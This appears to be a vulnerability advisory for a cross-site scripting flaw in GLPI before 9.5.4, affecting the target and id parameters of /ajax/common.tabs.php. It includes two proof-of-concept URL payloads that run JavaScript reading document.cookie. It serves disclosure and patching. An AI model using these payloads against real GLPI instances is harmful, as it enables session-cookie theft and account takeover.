GLPI is open source software which stands for Gestionnaire Libre de Parc Informatique and it is a Free Asset and IT Management Software package. In GLPI before verison 9.5.4, there is a vulnerability in the /ajax/common.tabs.php endpoint, indeed, at least two parameters target and id are not properly sanitized. Here are two payloads (due to two different exploitations depending on which parameter you act) to exploit the vulnerability:/ajax/common.tabs.php?target=javascript:alert(document.cookie)&itemtype=DisplayPreference&glpitab=DisplayPreference$2&id=258&displaytype=Ticket (Payload triggered if you click on the button). /ajax/common.tabs.php?target=/front/ticket.form.php&itemtype=Ticket&glpi_tab=Ticket$1&id=(){};(function%20(){alert(document.cookie);})();function%20a&#.